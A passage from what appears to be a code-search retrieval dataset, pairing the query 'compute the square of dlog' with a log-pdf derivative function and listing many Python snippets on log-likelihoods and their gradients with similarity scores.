* pt.sum(pt.log(diag))\n result += (delta_trans ** f(2)).sum()\n result = f(-0.5) * result\n logp = pt.switch(ok, result, -np.inf)\n\n def dlogp(inputs, gradients):\n (g_logp,) = gradients\n cov, delta = inputs\n\n g_logp.tag.test_value = floatX(1.0)\n n, k = delta.shape\n\n chol_cov = cholesky(cov)\n diag = pt.diag(chol_cov)\n ok = pt.all(diag > 0)\n\n chol_cov = pt.switch(ok, chol_cov, pt.fill(chol_cov, 1))\n delta_trans = solve_lower(chol_cov, delta.T).T\n\n inner = n * pt.eye(k) - pt.dot(delta_trans.T, delta_trans)\n g_cov = solve_upper(chol_cov.T, inner)\n g_cov = solve_upper(chol_cov.T, g_cov.T)\n\n tau_delta = solve_upper(chol_cov.T, delta_trans.T)\n g_delta = tau_delta.T\n\n g_cov = pt.switch(ok, g_cov, -np.nan)\n g_delta = pt.switch(ok, g_delta, -np.nan)\n\n return [-0.5 * g_cov * g_logp, -g_delta * g_logp]\n\n return OpFromGraph([cov, delta], [logp], grad_overrides=dlogp, inline=True)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n grad = ((self.v + 1) * e) / (self.v * self.sigma2 + (e**2))\r\n return grad", "def log_prob(self):\n res = -self.L_h/2*np.log(2*np.pi*self.la)\n res = res + self.L_h*(self.L_h-1)/2*self.a\n\n\n res = res - 1/(2*self.la)*np.square(np.linalg.norm(self.e*self.pie))\n\n res = res - 1/(2*self.la)*np.sum(self.e2*self.pie_var)\n\n res = res - self.L_h/2*np.log(2*np.pi*self.sigma2)\n res = res - 1/(2*self.sigma2)*(np.square(np.linalg.norm(self.w))+np.trace(self.R))\n\n print(\"Log-probability difference = {}\".format(res - self.LP), file=self.logfile)\n self.LP = res\n return res", "def logpdf(self, X) -> np.ndarray:\n if not isinstance(X, np.ndarray):\n X = np.array(X)\n H = 0.5 * ((X - self.means) / self.scales) ** 2\n Z = sqrt(2 * pi) * self.scales\n return -np.sum(H + np.log(Z), axis=1)", "def _finite_diff_gradient(self, parameters):\n assert isinstance(parameters,np.ndarray)\n # get the free indicies\n free_inds = np.nonzero(np.logical_not(self._fixed_indicies))[0]\n\n # first take a forward step in each direction\n step = 1e-6 # finite difference step\n log_like_fs = np.zeros(free_inds.size)\n for i,param_idx in enumerate(free_inds):\n p_fs = parameters.copy()\n p_fs[param_idx] += step # take a step forward\n log_like_fs[i] = self._compute_log_likelihood(p_fs)\n\n # compute the log likelihood at current point\n log_like = self._compute_log_likelihood(parameters)\n\n # compute the gradient\n gradient = np.zeros(parameters.shape) # default gradient is zero\n gradient[free_inds] = (log_like_fs-log_like)\n gradient[free_inds] = gradient[free_inds]/step # divide by step length\n return log_like, gradient", "def logpdf(self, X) -> np.ndarray:\n comp_logpdfs = [np.reshape(comp.logpdf(X), [-1, 1]) for comp in self.components]\n logpdfs = np.hstack(comp_logpdfs)\n result = logsumexp(logpdfs, axis=1, b=self.coefficients)\n return np.array(result)", "def dalf(x):\n return derivative(alf, x, dx=1e-6)", "def dlogdp(self):\n return np.log10(self.bins[:, -1]) - np.log10(self.bins[:, 0])", "def diff_log(x):\n\n return np.diff(np.log(x)),np.log(x)[0]", "def logaddexp(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n return torch.max(x, y) + torch.log(1 + torch.exp(-torch.abs(y - x)))", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def diff_log(x):\n \n return np.diff(np.log(x)),np.log(x)[0]", "def log_likelihood(self, theta, x, **kwargs):\n\n u, logdet_dudx, log_a = self.forward(theta, x, **kwargs)\n\n constant = float(-0.5 * self.n_inputs * np.log(2.0 * np.pi))\n # log_likelihood = torch.log(torch.sum(torch.exp(log_a - 0.5 * u ** 2 + logdet_dudx), dim=2))\n log_likelihood = torch.logsumexp(log_a - 0.5 * u**2 + logdet_dudx, dim=2)\n log_likelihood = constant + torch.sum(log_likelihood, dim=1)\n\n return u, log_likelihood", "def log_LxP(theta, D):\r\n p1 = np.exp( -((theta-D[0])**2)/2 )\r\n p2 = np.exp( -((theta-D[1])**2)/2 )\r\n if np.abs(theta) <= 1:\r\n LxP = p1*p2\r\n else:\r\n LxP = 0.0\r\n return np.log(LxP)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.asarray(link_f).shape == np.asarray(y).shape\r\n s2_i = (1.0/self.variance)\r\n grad = s2_i*y - s2_i*link_f\r\n return grad", "def ddalf(x):\n return derivative(dalf, x, dx=1e-6)", "def ddalf(x):\n return derivative(dalf, x, dx=1e-6)", "def grad_log_likelihood(self, log_occr_array=None):\n\n if log_occr_array is not None:\n # Catch invalid occurrence rates for zero likelihood\n try:\n self.log_occr = log_occr_array\n except InvalidOccurrenceRate:\n return -np.inf * np.ones_like(self.occr, dtype=float)\n\n # Calculate components first\n N_exp = self.calc_integral() * self._N_stars # perhaps not needed\n nexp_terms = self._N_stars * self.calc_bin_volumes() * self.H_bar_array\n s_terms = self.H_array * self.F_array * self.occr\n numerator_terms = self.H_array * self.F_array\n\n if not tf.is_tensor(self.occr):\n # Checking shapes of intermediate terms,\n # numerator_terms vs s_terms.sum(-1, -2) and vs v factors.\n intermediate_terms = numerator_terms / s_terms.sum(axis=(-1, -2))\n # TODO: v_factor changed to negative, I think a minus\n # sign had been missed\n grad_log_array = - nexp_terms + intermediate_terms.sum(axis=0)\n\n # BUG TODO\n if np.isnan(grad_log_array).any():\n warnings.warn(\".grad_log_likelihood value is nan.\")\n import pdb; pdb.set_trace()\n grad_log_array = -np.inf * grad_log_array\n else:\n raise NotImplementedError(\"Manual gradient calculate with \"\n \"tensorflow objects isn't \"\n \"implemented, and seems a bit \"\n \"redundant.\")\n\n return grad_log_array", "def log_likelihood(parameters):\n if len(copula.bounds_param) == 1:\n params = [parameters]\n else:\n param1, param2 = parameters\n params = [param1, param2]\n logl = -np.sum(np.log(copula.get_pdf(psd_obs[0], psd_obs[1], params)))\n return logl", "def __dNdlog2dN(self,Dp,dNdlogDp):\n \n x = np.log10(Dp)\n y = (x[1:]+x[:-1])/2.\n y = np.pad(y,1,'constant',constant_values=(x[0]-(y[0]-x[0]),x[-1]+(x[-1]-y[-1])))\n dlogDp = np.diff(y)\n return dNdlogDp*dlogDp # cm-3", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return logsumexp(parts)", "def derivative(self, theta):\n diag_gamma = np.dot(theta.T, self.X.T)\n logistic_term = self.logistic_fn(diag_gamma)\n diag_gamma = logistic_term * (1.0 - logistic_term)\n gamma = np.diag(diag_gamma)\n\n # v computation\n diags_v = 1.0 - 2*self.logistic_fn(np.dot(theta.T, self.X.T))\n diags_v = diags_v.reshape((-1, 1))\n diags_v = diags_v*self.X\n assert diags_v.shape == self.X.shape #N*d shape\n\n XtGamma = np.dot(self.X.T, gamma) # d*N shape\n\n # TODO: Verifier car pas sur de mon coup ... et surtout plus long...\n # id = np.eye(self.n_examples).reshape((self.n_examples, self.n_examples, 1))\n # diags_v = diags_v.reshape((self.n_examples, 1, self.dim))\n # v = id*diags_v # n*n*d tensor\n # left = np.tensordot(XtGamma, v, axes=(1, 0)) # shape d*N*d\n # assert left.shape == (self.dim, self.n_examples, self.dim)\n # dg = np.tensordot(left, self.X, axes=(1, 0))\n # dg = np.swapaxes(dg, axis1=-2, axis2=-1)\n\n dg = np.zeros((self.dim, self.dim, self.dim))\n for idx, v_i_diag in enumerate(diags_v.T):\n v_i = np.diag(v_i_diag)\n dg_di = np.dot(np.dot(XtGamma, v_i), self.X)\n dg[:, :, idx] = dg_di\n return dg", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = 1./link_f - y\r\n #grad = y/(link_f**2) - 1./link_f\r\n return grad", "def _forward_log_det_jacobian(self, x):\n d = self._compute_shared(x=x)\n relx = (x - d.x_k) / d.w_k\n relx = relx # tf.where(d.out_of_bounds, 0.5*tf.ones_like(x), relx)\n grad = (\n 2 * tf.math.log(d.s_k) +\n tf.math.log(d.d_kp1 * relx**2 + 2 * d.s_k * relx * (1 - relx) + # newln\n d.d_k * (1 - relx)**2) -\n 2 * tf.math.log((d.d_kp1 + d.d_k - 2 * d.s_k) * relx *\n (1 - relx) + d.s_k))\n return grad # tf.where(d.out_of_bounds, tf.zeros_like(grad), grad)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n grad = (y/link_f) - (1.-y)/(1-link_f)\r\n return grad", "def logp(self, F, Y):\n raise NotImplementedError(\"implement the logp function\\\n for this likelihood\")", "def all_logpdf(x, shape_par):\n return stat.logpdf(x, *shape_par)", "def log_density(\n self,\n theta_unc: FloatArray,\n *,\n propto: bool = True,\n jacobian: bool = True,\n ) -> float:\n lp = ctypes.pointer(ctypes.c_double())\n err = ctypes.pointer(ctypes.c_char_p())\n rc = self._log_density(\n self.model, int(propto), int(jacobian), theta_unc, lp, err\n )\n if rc:\n raise self._handle_error(err.contents, \"log_density\")\n return lp.contents.value", "def dlogpdf_dlink(self, link_f, y, Y_metadata=None):\n grad = 1./link_f - y\n #grad = y/(link_f**2) - 1./link_f\n return grad", "def logpdf(self, X, pool=None):\n logpdfs = []\n for logweight, space, kde in zip(self._logweights,\n self._spaces,\n self._kdes):\n # Calculate the probability for each parameter space individually\n if np.all(space == ~X.mask) and np.isfinite(logweight):\n logpdfs.append(logweight + kde(X[space], pool=pool))\n\n return logsumexp(logpdfs, axis=0)", "def log_density_gradient(\n self,\n theta_unc: FloatArray,\n *,\n propto: bool = True,\n jacobian: bool = True,\n out: Optional[FloatArray] = None,\n ) -> Tuple[float, FloatArray]:\n dims = self.param_unc_num()\n if out is None:\n out = np.zeros(shape=dims)\n elif out.size != dims:\n raise ValueError(f\"out size = {out.size} != params size = {dims}\")\n lp = ctypes.pointer(ctypes.c_double())\n err = ctypes.pointer(ctypes.c_char_p())\n rc = self._log_density_gradient(\n self.model, int(propto), int(jacobian), theta_unc, lp, out, err\n )\n if rc:\n raise self._handle_error(err.contents, \"log_density_gradient\")\n return lp.contents.value, out", "def dsdlogdp(self):\n return self.dndlogdp.mul(self.s_multiplier)", "def grad_neg_log_like(params):\n gp.set_parameter_vector(params)\n return -gp.grad_log_likelihood(y, quiet=True)", "def logpdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized logposterior not implemented\")", "def log_prob(self, x):\n z, log_det = self.backward_p(x)\n return self.prior.log_prob(z) + log_det", "def test_cloglog_transform_deriv_v(self):\n # Note the index has a value that is <= -40 to test whether or not\n # the function correctly uses L'Hopital's rule to deal with underflow\n # and calculating the derivative. When the index is <= -40, the\n # derivative should be 1.\n test_index = np.array([-40, 1, 7])\n # Note we use a compressed sparse-row matrix so that we can easily\n # convert the output matrix to a numpy array using the '.A' attribute.\n test_output = diags(np.ones(test_index.shape[0]),\n 0, format='csr')\n\n # Bundle the arguments needed for the function\n # Not all elements except for test_index are completely fake and only\n # needed because the function requires a given number of arguments.\n # This is for api compatibility with other models.\n args = [test_index,\n np.ones(3),\n diags(np.ones(3), 0, format='csr'),\n None]\n\n # Get the derivative using the function defined in clog_log.py.\n derivative = clog._cloglog_transform_deriv_v(*args,\n output_array=test_output)\n\n # Calculate, 'by hand' what the results should be\n correct_derivatives = np.diag(np.array([1,\n 2.910328703250801,\n 1096.6331584284585]))\n\n self.assertIsInstance(derivative, type(test_output))\n self.assertEqual(len(derivative.shape), 2)\n self.assertEqual(derivative.shape, (3, 3))\n npt.assert_allclose(correct_derivatives, derivative.A)\n\n return None", "def grad_llh(self, params):\n grad = np.clip(self.grad_log_likelihood(params[0], params[1], params[2:]), SMALLEST_NUMBER,\n LARGEST_NUMBER)\n\n return grad", "def logpdf(self, flattened_parameters):\n unflattened_parameters = self.unflatten_parameter_array(flattened_parameters)\n dict_to_pass = {**unflattened_parameters, **self.data_dict}\n return np.sum([x.logpdf(**dict_to_pass) for x in self.node_dict.values()])", "def log_pacc(xy, x, y, h):\n logp = log_q(xy, y, x, h)\n logp += xy.log_density(y)\n logp -= log_q(xy, x, y, h)\n logp -= xy.log_density(x)\n return logp", "def log_pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.log_pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def _sderiv_log10(self,t,x,params_sens = None):\n if params_sens is None:\n print(\"Please set the parameter values\")\n params_unif = {}\n for param_name, param_val in params_sens.items():\n bound_a, bound_b = self.param_sens_bounds[param_name]\n params_unif[param_name] = ((bound_b - bound_a)*param_val/2 + (bound_a + bound_b)/2) \n return super()._sderiv_log10(t,x,params_sens = params_unif)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def logtrapz(logy, x=None, dx=1.0):\n n_intvls = logy.shape[0]-1\n loghalf = log(.5)\n if x is not None:\n logdel = x[1:] - x[0:-1]\n else:\n logdel = ones(n_intvls)*dx\n logdel = log(logdel)\n lo = logy[0] + loghalf + logdel[0]\n hi = logy[-1] + loghalf + logdel[-1]\n lsum = logaddexp(lo, hi)\n for i in xrange(1,n_intvls):\n lsum = logaddexp(lsum, logy[i] + logdel[i])\n return lsum", "def log_norm_pdf(x, sigma):\n _, det_sigma = np.linalg.slogdet(sigma)\n return -0.5*np.dot(x.T, np.linalg.solve(sigma,x))[0,0] - np.log(2*np.pi) - det_sigma", "def nloglikeobs(self, params):\n #print len(params),\n beta = params[:-2]\n df = params[-2]\n scale = params[-1]\n loc = np.dot(self.exog, beta)\n endog = self.endog\n x = (endog - loc)/scale\n #next part is stats.t._logpdf\n lPx = sps_gamln((df+1)/2) - sps_gamln(df/2.)\n lPx -= 0.5*np_log(df*np_pi) + (df+1)/2.*np_log(1+(x**2)/df)\n lPx -= np_log(scale) # correction for scale\n return -lPx", "def photometric_stellarparam_derivatives(Teff, logg,\n dTdcolor,dvtdlogg=None,\n color=None, dTdcolor_func=None):\n \n dloggdT = 4/(np.log(10) * Teff) + 0.4/dTdcolor\n \n if dvtdlogg is None or dvtdlogg==\"B05\":\n # This is the analytic derivative of the Barklem+2005 relation\n dvtdlogg = 0.173 * logg - 0.6897\n elif dvtdlogg == \"M08\":\n dvdtdlogg = -0.322\n elif dvtdlogg == \"K09\":\n dvdtdlogg = -0.23\n return dloggdT, dvtdlogg", "def passDerivative(self):\n # this will happen when this SumNode is unused\n if self.getLogDerivative() == Node.ZERO:\n return \n for decomp_id in self.getChildren():\n prodNode = self.getChild(decomp_id)\n tmp = self.getLogDerivative() \\\n + np.log(float(self.getChildCounts(decomp_id)) / self.getCounts())\n\n if prodNode.getLogDerivative() == Node.ZERO:\n prodNode.setLogDerivative(tmp)\n else:\n prodNode.setLogDerivative( \\\n np.logaddexp(tmp, self.getLogDerivative()))", "def log_prior_grad(self, inputs):", "def inverse_diff_log(y,log0):\n\n return np.exp(inverse_diff(y,log0))", "def dlogpdf_link_dvar(self, link_f, y, Y_metadata=None):\n\n c = np.zeros_like(y)\n if Y_metadata is not None and 'censored' in Y_metadata.keys():\n c = Y_metadata['censored']\n\n val = np.log(y) - link_f\n val_scaled = val/np.sqrt(self.variance)\n val_scaled2 = val/self.variance\n a = (1 - stats.norm.cdf(val_scaled))\n uncensored = (1-c)*(-0.5/self.variance + (val**2)/(2*(self.variance**2)) )\n censored = c *( val*np.exp(-val**2/ (2*self.variance)) / (a*np.sqrt(2*np.pi)*2*(self.variance**(1.5))) )\n dlogpdf_dvar = uncensored + censored\n # dlogpdf_dvar = dlogpdf_dvar*self.variance\n return dlogpdf_dvar", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def posterior_loss(X, mu, sigma, log_pi):\r\n log_PDF = log_GaussPDF(X, mu, sigma)\r\n log_post = log_posterior(log_PDF, log_pi)\r\n\r\n loss = torch.logsumexp(log_post, dim=1)\r\n # loss = torch.exp(log_post)\r\n # loss = torch.sum(loss, dim=1)\r\n # loss = torch.log(loss)\r\n loss = torch.sum(loss)\r\n loss = -loss\r\n return loss", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def log_likelihood(self):\n\n if self._log_likelihood is None:\n self._log_likelihood = logpdf(x=self.y, cov=self.S)\n return self._log_likelihood", "def dlogpdf_link_dvar(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n dlogpdf_dvar = self.v*(e**2 - self.sigma2)/(2*self.sigma2*(self.sigma2*self.v + e**2))\r\n return np.sum(dlogpdf_dvar)", "def log_likelihood_gradients(self, y, f):\n # align shapes and compute mask\n y = y.reshape(-1, 1)\n f = f.reshape(-1, 1)\n mask = np.isnan(y)\n y = np.where(mask, f, y)\n\n # compute gradients of the log likelihood\n log_lik, J, H = vmap(self.log_likelihood_gradients_)(y, f)\n\n # apply mask\n mask = np.squeeze(mask)\n log_lik = np.where(mask, 0., log_lik)\n J = np.where(mask, np.nan, J)\n H = np.where(mask, np.nan, H)\n\n return log_lik, J, np.diag(H)", "def dlogpdf_dlink(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return y/link_f - 1", "def LL(y, yhat):\n\n return -np.sum(norm.logpdf(y, loc=yhat, scale=np.std(y)))", "def inverse_diff_log(y,log0):\n \n return np.exp(inverse_diff(y,log0))", "def log_gamma_unnormalised_lpdf(x, alpha, beta):\n return alpha * x - beta * tf.exp(x)", "def ddalf(x):\n return dalf_spl.derivatives(x)[1]" ]
[ "0.77660567", "0.70519257", "0.6876588", "0.6850686", "0.67922556", "0.677512", "0.67627126", "0.67627126", "0.6756322", "0.67217326", "0.67073756", "0.65952337", "0.6584878", "0.6568949", "0.65437335", "0.6536892", "0.65261656", "0.65239733", "0.651334", "0.6512677", "0.6508049", "0.64886004", "0.6481579", "0.6441033", "0.6440329", "0.6438905", "0.64342606", "0.6430511", "0.6428168", "0.640558", "0.64006346", "0.63819534", "0.63742536", "0.6370675", "0.63610005", "0.63602763", "0.6348054", "0.6314391", "0.62960535", "0.6283043", "0.6282809", "0.626877", "0.6237661", "0.6234541", "0.6232098", "0.62295455", "0.6220143", "0.6198616", "0.61962056", "0.61893904", "0.6187063", "0.61756223", "0.61743283", "0.6173269", "0.6173269", "0.61719704", "0.6168255", "0.61544967", "0.6135736", "0.6133827", "0.6126694", "0.6121292", "0.6114071", "0.6105251", "0.61023813", "0.6100833", "0.6097435", "0.609394", "0.6093167", "0.60813755", "0.60613155", "0.60599744", "0.6046563", "0.60453933", "0.6042667", "0.6030531", "0.60291415", "0.6023166", "0.6020554", "0.6020444", "0.6020254", "0.6018804", "0.6016359", "0.6005829", "0.6005371", "0.5997181", "0.5993268", "0.59781915", "0.59747344", "0.5974362", "0.59707326", "0.59685886", "0.5963416", "0.5959489", "0.59565234", "0.5956445", "0.59517485", "0.5942429", "0.59384006", "0.59356576" ]
0.82203406
0
Compute the square (in matrix terms) of dlog. This is the variable whose expectance is the FisherRao information.
def log_pdf_derivative_squared(x): dlog = log_pdf_derivative(x) return gs.einsum("...i, ...j -> ...ij", dlog, dlog)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logdim():\n dim = Real(\"yolo4\", \"reciprocal\", 1.0, 10.0, shape=(3, 2))\n return dim", "def dloglam(self):\n # This number was determined using the resolution and sampling quoted on the FIRE website\n R = 6000.0 * 2.7\n dloglam = 1.0 / R / np.log(10.0)\n return dloglam", "def calc_F(self, peq):\n return self.dmat_d_.dot(np.log(peq))", "def logm(self, x):\n\n if K.backend() == 'theano':\n # construct theano tensor operation\n from theano.tensor.nlinalg import svd, diag\n from theano.tensor.elemwise import Elemwise\n from theano.scalar import log\n import theano.tensor as T\n # This implementation would be extremely slow. but efficient?\n u, d, v = svd(x)\n d += self.eps\n inner = diag(T.log(d))\n res = T.dot(u, T.dot(inner, v))\n return res\n else:\n from kyu.tensorflow.ops.svd_gradients import batch_matrix_log\n return batch_matrix_log(x, self.eps)", "def SFlnlike(self,theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=-1.0*np.sum(np.log(self.SFlike_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log(self) -> np.ndarray:\n S = 0.5*(self.A-self.A.T) # Skew-symmetric matrix\n y = np.array([S[2, 1], -S[2, 0], S[1, 0]]) # Axis\n if np.allclose(np.zeros(3), y):\n return np.zeros(3)\n y2 = np.linalg.norm(y)\n return np.arcsin(y2)*y/y2", "def lnlike(theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=np.sum(np.log(like_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log(self: Float[LinearOperator, \"*batch M N\"]) -> Float[LinearOperator, \"*batch M N\"]:\n return ConstantDiagLinearOperator(self.diag_values.log(), diag_shape=self.diag_shape)", "def log(obj):\n\tif isinstance(obj, Variable):\n\t\tval = np.log(obj.val)\n\t\tder = np.divide(1,obj.val)\n\t\t# print(obj.der)\n\t\t# print(der)\n\t\t# print(obj.der.shape)\n\t\t# print(der.shape)\n\t\tif len(obj.der.shape)>len(der.shape):\n\t\t\tder = np.expand_dims(der,1)\n\t\tder = np.multiply(der, obj.der)\n\t\treturn Variable(val, der)\n\telse:\n\t\treturn np.log(obj)", "def log(self: Float[LinearOperator, \"*batch M N\"]) -> Float[LinearOperator, \"*batch M N\"]:\n return self.__class__(self._diag.log())", "def logarithm(self) -> np.ndarray:\n u = self.v/np.linalg.norm(self.v)\n if self.is_versor():\n if self.is_pure():\n return np.array([0.0, *(0.5*np.pi*u)])\n return np.array([0.0, *(u*np.arccos(self.w))])\n qn = np.linalg.norm(self.A)\n if self.is_pure():\n return np.array([np.log(qn), *(0.5*np.pi*u)])\n return np.array([np.log(qn), *(u*np.arccos(self.w/qn))])", "def aiot(d):\n res = A * (1-exp(-d/D)) / magic\n _adjust(res)\n return ( log(res) if use_log\n else res )", "def log_q(xy, x, y, h):\n return -linalg.norm(y - x - h*xy.grad_log_density(x))/(4*h)", "def log(d: D) -> NumDict:\n\n return d.log()", "def logarithmic():\n return Equivalency(\n [(dimensionless_unscaled, function_units.dex, np.log10, lambda x: 10.0**x)],\n \"logarithmic\",\n )", "def log(self):\n return F.Log.apply(self)", "def grad_log(self, X):\n # \"\"\"\n # Evaluate the gradients (with respect to the input) of the log density at\n # each of the n points in X. This is the score function.\n\n # X: n x d numpy array.\n XB = np.dot(X, self.B)\n Y = 0.5*XB + self.c\n E2y = np.exp(2*Y)\n # n x dh\n Phi = old_div((E2y-1.0),(E2y+1))\n # n x dx\n T = np.dot(Phi, 0.5*self.B.T)\n S = self.b - X + T\n return S", "def weighted_log_density(self):\n return self.rho*math.log(self.density)", "def test_loglike(dlm,Cl,noise,beam):\n lmax = Cl.shape[0]\n tt_exp = -1./2 * np.real(np.vdot(dlm.T,hp.almxfl(dlm,1/(beam[:lmax]**2*Cl[:,1]+noise[:lmax]))))\n #plt.plot(Cl[:,1])\n tt_det = - 1./2 *(np.arange(1,lmax+1)*np.log((noise[:lmax]+Cl[:,1]*beam[:lmax]**2))).sum() \n tt_f = tt_exp + tt_det\n return tt_exp,tt_det,tt_f#,Cl[:,1]", "def dsdlogdp(self):\n return self.dndlogdp.mul(self.s_multiplier)", "def pddet(A):\r\n L = jitchol(A)\r\n logdetA = 2*sum(np.log(np.diag(L)))\r\n return logdetA", "def _R(self):\n return np.exp(self._log_R)", "def _loglike(self, y, f):\n ll = -0.5 * (tf.log(2 * self.variance * np.pi) +\n (y - f)**2 / self.variance)\n return ll", "def log_det_S(self, Rs = None):\n if Rs is None:\n Rs = self.Rs\n return np.sum([self.n/R.shape[0]*\n np.linalg.slogdet(R.T.dot(R))[1]\n for R in Rs])", "def fisher_diag(\n negative_log_likelihood: LossFun,\n params: Any,\n inputs: jnp.ndarray,\n targets: jnp.ndarray,\n) -> jnp.DeviceArray:\n return jnp.square(\n ravel(jax.grad(negative_log_likelihood)(params, inputs, targets)))", "def _log_det_observation_precision(self):\n return tf.reduce_sum(tf.linalg.logdet(self._r_inv), axis=-1)", "def ln(q):\n normq = amplitude(q)\n res = np.zeros_like(q)\n res[:,3:] = np.log(normq)\n res[:,:3] = norm(q[:,:3])\n res[:,:3] *= np.arccos(q[:,3:]/normq)\n return res", "def _log_det_observation_precision(self):\n return tf.reduce_sum(tf.linalg.logdet(self._r_inv_data), axis=-1)", "def log2(self):\n return Factor().__build( VarSet(self.v) , np.log2(self.t) )", "def log(self): # just use base?\n return Factor().__build( VarSet(self.v) , np.log(self.t) )", "def __convert_to_log(self):\n for i in range(self.nStates):\n if self.pi[i]>0:\n self.pi[i]=log(self.pi[i])\n else:\n self.pi[i]=float('-inf')\n for j in range(self.nStates):\n if self.t[i][j]>0:\n self.t[i][j]=log(self.t[i][j])\n else:\n self.t[i][j]=float('-inf')\n for j in range(self.nObs):\n if self.e[i][j]>0:\n self.e[i][j]=log(self.e[i][j])\n else:\n self.e[i][j]=float('-inf')\n self.logdomain=True", "def lognormexp(values, dim=0):\n\n log_denominator = torch.logsumexp(values, dim=dim, keepdim=True)\n # log_numerator = values\n return values - log_denominator", "def lognormexp(values, dim=0):\n\n log_denominator = torch.logsumexp(values, dim=dim, keepdim=True)\n # log_numerator = values\n return values - log_denominator", "def test_log():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.log(fwd.sin(x)+y**2)\n dfdx = lambda x, y: np.cos(x) / (np.sin(x)+y**2)\n dfdy = lambda x, y: 2*y / (np.sin(x)+y**2)\n d2fdxdy = lambda x, y: -2*y*np.cos(x) / (np.sin(x)+y**2)**2\n assert equals(f.evaluation_at({x: 1.5, y:2.5}), np.log(np.sin(1.5)+2.5**2))\n assert equals(f.derivative_at(x, {x: 1.5, y:2.5}), dfdx(1.5, 2.5))\n assert equals(f.derivative_at(y, {x: 1.5, y:2.5}), dfdy(1.5, 2.5))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}), d2fdxdy(1.5, 2.5))\n with pytest.raises(NotImplementedError):\n f.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def convert_deriv_to_log10(J,dpred):\n Jlog = np.log10(np.exp(1.0)) * J /dpred\n # That /dpred divides element-wise into every column the matrix via Python's broadcasting.\n return Jlog", "def _compute_log_det_cholesky(matrix_chol, covariance_type, n_features):\n if covariance_type == 'full':\n n_components, _, _ = matrix_chol.shape\n log_det_chol = (np.sum(np.log(\n matrix_chol.reshape(\n n_components, -1)[:, ::n_features + 1]), 1))\n\n elif covariance_type == 'tied':\n log_det_chol = (np.sum(np.log(np.diag(matrix_chol))))\n\n elif covariance_type == 'diag':\n log_det_chol = (np.sum(np.log(matrix_chol), axis=1))\n\n else:\n log_det_chol = n_features * (np.log(matrix_chol))\n\n return log_det_chol", "def Schechter_log(self, logl, phis, alpha, logls):\n l = np.power(10., logl)\n ls = np.power(10., logls)\n phi = np.log(10) * phis * np.power(l / ls, (alpha + 1)) * np.exp(-l / ls)\n return phi", "def loglike(store):\n nobs = store['yvec'].shape[0]\n calcweighted(store)\n store['regsampler'].update_yvec(store['yvectil'])\n store['regsampler'].update_xmat(store['xmattil'])\n return store['regsampler'].loglike(store['sigma'], store['beta'])", "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n tr_filter = trfbank(samplingrate, nfft)\n return np.log(np.dot(input, tr_filter.transpose()))", "def log_deriv(error):\n return logistic(error) * (1 - logistic(error))", "def my_square(d):asaasasassssssssssssssssssssssssss\n\t return (d ** 3)", "def log_joint(self):\n return sum([\n self.log_marg_like(self.gamma, self.gamma0, self.lamb, self.nu),\n self._gamma0_distribution.logpdf(self.gamma0),\n self._nu_distribution.logpdf(self.nu),\n self._lambda_distribution.logpdf(self.lamb),\n self.probit_distribution(self.xi).logpdf(self.gamma),\n self._xi_distribution.logpdf(self.xi) if self.sample_xi else 0.0\n ])", "def radio_lumfn(L, _params):\n print _params\n # Number density as a function of sfr, dn/dlog(sfr)\n sfr = L * 5.52e-29 # erg/s/Hz, Bell (2003), Eq. 6\n dndlogsfr_sfms, dndlogsfr_pass = g.sfr_fn(hm, sfr, z=0., params=_params)\n #phi = dndlogsfr_sfms #+ dndlogsfr_pass\n return dndlogsfr_sfms, dndlogsfr_pass", "def log2(obj):\n\tif isinstance(obj, Variable):\n\t\tval = np.log2(obj.val)\n\t\tder = np.divide(1,obj.val)\n\t\tif len(obj.der.shape)>len(der.shape):\n\t\t\tder = np.expand_dims(der,1)\n\t\tder = np.multiply(der, obj.der)\n\t\treturn Variable(val, der)\n\telse:\n\t\treturn np.log2(obj)", "def _calculate_log_det(self, var):\n log_det = []\n\n for k in range(self.n_components):\n evals, evecs = tf.linalg.eig(var[0, k])\n\n 